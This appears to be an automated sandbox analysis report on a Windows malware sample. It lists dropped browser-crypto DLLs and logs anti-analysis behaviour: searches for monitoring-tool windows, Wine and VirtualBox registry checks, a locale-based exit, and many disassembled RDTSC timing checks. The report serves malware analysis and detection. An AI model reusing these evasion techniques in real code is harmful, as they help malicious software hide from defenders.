Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00999860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-57211

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E1A9 second address: D5E1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB77110B466h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E1B5 second address: D5E1DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FB770CC1333h 0x00000012 pushad 0x00000013 jmp 00007FB770CC1314h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E348 second address: D5E34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E34D second address: D5E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB770CC1319h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E4EC second address: D5E4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FB77110B46Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E4F9 second address: D5E4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5E4FD second address: D5E514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB77110B473h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6113B second address: D611B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB770CC1310h 0x00000009 popad 0x0000000a add dword ptr [esp], 5D700E6Ah 0x00000011 mov dword ptr [ebp+122D2F90h], eax 0x00000017 push 00000003h 0x00000019 jmp 00007FB770CC130Bh 0x0000001e jmp 00007FB770CC130Fh 0x00000023 push 00000000h 0x00000025 jmp 00007FB770CC1318h 0x0000002a push 00000003h 0x0000002c clc 0x0000002d mov esi, eax 0x0000002f call 00007FB770CC1309h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FB770CC1311h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D611B4 second address: D611B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D611B9 second address: D611EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB770CC130Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB770CC1314h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D611EB second address: D611F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D611F2 second address: D61265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FB770CC1317h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push esi 0x00000015 jnp 00007FB770CC1308h 0x0000001b pop esi 0x0000001c pop eax 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007FB770CC1308h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 lea ebx, dword ptr [ebp+12452FF4h] 0x0000003d sub dword ptr [ebp+122D1833h], esi 0x00000043 push eax 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D612BC second address: D61300 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB77110B466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2CF5h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FB77110B468h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push 622C44A7h 0x00000035 push eax 0x00000036 push edx 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61300 second address: D61305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61461 second address: D61465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61465 second address: D61469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61469 second address: D61494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 ja 00007FB77110B46Ch 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D19B9h], esi 0x00000016 push 9E9ACF8Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007FB77110B468h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61494 second address: D614FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 616530F6h 0x00000010 mov dword ptr [ebp+122D1BB2h], edx 0x00000016 push 00000003h 0x00000018 sub dword ptr [ebp+122D2F90h], esi 0x0000001e push 00000000h 0x00000020 jp 00007FB770CC130Ch 0x00000026 push 00000003h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FB770CC1308h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov ecx, 5B6E1466h 0x00000047 push 5226725Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D614FD second address: D61503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81A9B second address: D81AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81C16 second address: D81C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jbe 00007FB77110B466h 0x00000017 jmp 00007FB77110B471h 0x0000001c popad 0x0000001d jmp 00007FB77110B477h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81C56 second address: D81C75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FB770CC1306h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB770CC1313h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81DA3 second address: D81DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81DA7 second address: D81DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81DC7 second address: D81DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB77110B466h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81DD6 second address: D81DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnc 00007FB770CC130Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81DED second address: D81DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D824A5 second address: D824A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8262E second address: D82634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82935 second address: D82944 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82944 second address: D82951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB77110B466h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82951 second address: D8296A instructions: 0x00000000 rdtsc 0x00000002 je 00007FB770CC130Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FB770CC1306h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8296A second address: D8296E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4735D second address: D4736A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007FB770CC1312h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83235 second address: D83239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83239 second address: D83268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1311h 0x00000007 jmp 00007FB770CC1315h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D83396 second address: D833B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB77110B472h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8482A second address: D8483B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB770CC130Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8501A second address: D85020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D862F5 second address: D862F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D862F9 second address: D8631B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB77110B478h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8631B second address: D86377 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB770CC131Ch 0x00000008 jmp 00007FB770CC1316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FB770CC1313h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FB770CC1315h 0x00000022 jmp 00007FB770CC130Ah 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D86377 second address: D86391 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FB77110B466h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007FB77110B474h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D86391 second address: D86395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D875D3 second address: D875F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D875F4 second address: D875F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F91D second address: D8F923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F923 second address: D8F92D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57EE4 second address: D57EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57EEA second address: D57EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EF05 second address: D8EF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EF09 second address: D8EF0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EF0D second address: D8EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F096 second address: D8F09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F09A second address: D8F0A8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB77110B466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F0A8 second address: D8F0C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FB770CC1306h 0x0000000f jc 00007FB770CC1306h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9000A second address: D9000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D906BA second address: D906BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90A8B second address: D90A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90B02 second address: D90B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007FB770CC130Eh 0x0000000d xchg eax, ebx 0x0000000e add esi, 3C7A9CB7h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90B25 second address: D90B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90B29 second address: D90B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90B2F second address: D90B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90D02 second address: D90D25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1313h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FB770CC1308h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90D25 second address: D90D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D910BE second address: D910CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FB770CC1306h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D910CB second address: D910CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92F78 second address: D92F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB770CC1306h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92F8B second address: D92F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9378F second address: D93795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D94671 second address: D9467C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95124 second address: D9513F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9513F second address: D95144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95144 second address: D95156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FB770CC1308h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95156 second address: D951B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edi, 7DB5FCF4h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FB77110B468h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3901h], edi 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D2AC5h] 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jp 00007FB77110B46Ch 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D951B2 second address: D951C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB770CC1311h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D95C3D second address: D95C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D964DE second address: D964E8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D964E8 second address: D964EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96FA1 second address: D96FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96FA5 second address: D96FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9A7A8 second address: D9A7AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96FA9 second address: D96FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96FAF second address: D96FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BE41 second address: D9BE4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB77110B466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9BE4B second address: D9BE4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
